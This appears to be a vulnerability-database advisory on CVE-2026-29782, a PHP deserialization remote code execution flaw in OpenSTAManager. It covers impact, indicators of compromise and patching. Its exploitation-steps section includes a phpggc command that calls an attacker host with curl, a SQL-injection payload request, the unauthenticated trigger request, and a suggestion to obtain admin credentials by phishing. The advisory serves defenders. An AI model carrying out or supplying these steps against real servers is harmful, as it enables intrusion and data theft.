CVE-2026-29782: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-29782 is a Remote Code Execution (RCE) vulnerability in OpenSTAManager caused by insecure PHP deserialization in the OAuth2 module. The oauth2.php endpoint is unauthenticated ($skip_permissions = true) and calls unserialize() on attacker-controlled data from the zz_oauth2 database table without restricting allowed classes. All versions up to and including 2.10.1 are affected; version 2.10.2 contains the fix. The vulnerability was disclosed on April 1, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory).

Technical details

The root cause is CWE-502 (Deserialization of Untrusted Data): src/Models/OAuth2.php calls unserialize() at lines 151 and 193 without the allowed_classes parameter, permitting instantiation of any class available in the Composer autoloader. The attack chain begins at the unauthenticated oauth2.php endpoint, which reads the state GET parameter and fetches the corresponding zz_oauth2 record; the configure() call then triggers checkTokens() → getAccessToken() → unserialize($this->access_token). An attacker first writes a malicious serialized PHP object (gadget chain Laravel/RCE22 from phpggc) into the access_token column — achievable via the related SQL injection in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) — and then triggers deserialization with an unauthenticated GET request. The gadget chain fires PendingBroadcast.__destruct() during PHP error cleanup (after a 500 response), ultimately calling system($command) as www-data (GitHub Advisory, OSM Security Advisory).

Impact

Successful exploitation grants arbitrary OS command execution as the www-data web server user, enabling full confidentiality compromise (reading server files, database credentials, API keys), integrity compromise (writing web shells, installing backdoors, modifying application code), and availability impact (deleting files, causing denial of service). The www-data context also allows lateral movement to other systems reachable from the server network. The chained nature of the attack (SQL injection + deserialization) means an attacker with admin credentials can achieve unauthenticated RCE as a second stage (GitHub Advisory).

Exploitability

A fully functional Python proof-of-concept exploit (exploit.py + listener.py) is publicly available in the GitHub Security Advisory, using phpggc to generate the Laravel/RCE22 gadget chain payload (OSM Security Advisory). The exploit requires admin credentials only for the SQL injection payload injection step; the RCE trigger itself is completely unauthenticated. As of the time of reporting, there is no evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.038% (24th percentile), indicating low but non-zero exploitation probability (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing OpenSTAManager instances running version ≤ 2.10.1 using Shodan, Censys, or similar tools. Confirm the presence of /oauth2.php and /actions.php endpoints.
  2. Obtain admin credentials: Acquire valid admin credentials through phishing, credential stuffing, or other means. Note: the SQL injection step requires an authenticated admin session.
  3. Generate gadget chain payload: Use phpggc to generate a Laravel/RCE22 serialized PHP object that executes the desired command (e.g., curl attacker-host/rce-$(id|base64 -w0)):
    php phpggc Laravel/RCE22 system 'curl http://attacker:9999/rce-$(id|base64 -w0)'
  4. Inject payload via SQL injection: Authenticate to the application and POST to /actions.php using the op=risolvi-conflitti-database handler in the Aggiornamenti module to execute arbitrary SQL, inserting the serialized payload into zz_oauth2.access_token. Include DDL statements (CREATE TABLE/DROP TABLE) to force an implicit MySQL commit and bypass the transaction rollback:
    POST /actions.php
    op=risolvi-conflitti-database&id_module=<ID>&queries=["DELETE FROM zz_oauth2 WHERE state='poc-xxx'","INSERT INTO zz_oauth2 (..., state, access_token, ...) VALUES (..., 'poc-xxx', 0x<hex_payload>, ...)","CREATE TABLE IF NOT EXISTS _t(i INT)","DROP TABLE IF EXISTS _t"]
  5. Trigger unauthenticated RCE: Send an unauthenticated GET request to oauth2.php with the injected state value:
    GET /oauth2.php?state=poc-xxx&code=x
    The server responds with HTTP 500, but PendingBroadcast.__destruct() fires during PHP error cleanup and executes the command as www-data.
  6. Receive callback: The attacker's listener receives an HTTP callback containing the base64-encoded command output, confirming RCE (OSM Security Advisory).

Indicators of compromise

  • Network:

    • Unauthenticated GET requests to /oauth2.php with a state parameter matching a value recently inserted into the database (e.g., poc- prefix or random alphanumeric string)
    • Outbound HTTP requests from the web server to unknown external IPs (callback from curl or similar commands executed via RCE)
    • Unusual POST requests to /actions.php with op=risolvi-conflitti-database containing large hex-encoded queries payloads
  • Logs:

    • Web server access logs showing GET /oauth2.php?state=<random>&code=x returning HTTP 500
    • Application logs showing PHP fatal errors related to PendingBroadcast or missing hasExpired() method
    • Authentication logs showing admin login followed immediately by POST to /actions.php with the risolvi-conflitti-database operation
  • Database:

    • Unexpected rows in the zz_oauth2 table with unusual name, class, or binary access_token values
    • Presence of temporary tables such as _poc_ddl_commit or _t in the database schema
  • File System:

    • New or modified files in the web root created by the www-data user (web shells, backdoors)
    • Presence of /tmp/phpggc/ directory on the server (if the attacker installed phpggc directly)
  • Process:

    • Unusual child processes spawned by the PHP/Apache process (e.g., curl, bash, wget, python) (OSM Security Advisory)

Mitigation and workarounds

Upgrade OpenSTAManager to version 2.10.2 or later, which restricts unserialize() calls in src/Models/OAuth2.php to only allow AccessToken::class via the allowed_classes parameter, preventing arbitrary gadget chain instantiation (OSM Release v2.10.2, Patch Commit). If immediate upgrade is not possible, consider the following interim mitigations: (1) restrict database write access to the zz_oauth2 table to authorized users only; (2) add authentication to oauth2.php by removing $skip_permissions = true or validating the state parameter against a session-stored value; (3) deploy a WAF rule to block unauthenticated requests to /oauth2.php. Version 2.10.2 also patches the related SQL injection vulnerabilities in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) that enable the payload injection step (GitHub Advisory).

Community reactions

The vulnerability was discovered and reported by security researcher Omar Ramirez (GitHub: ormzro), who published a detailed advisory including fully functional exploit scripts (OSM Security Advisory). The advisory was covered by security aggregators including CVEFeed, VulDB, and Infinitsec shortly after disclosure (Infinitsec Blog). The OpenSTAManager maintainers responded promptly, releasing the patched version 2.10.2 and addressing multiple related SQL injection vulnerabilities in the same release.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management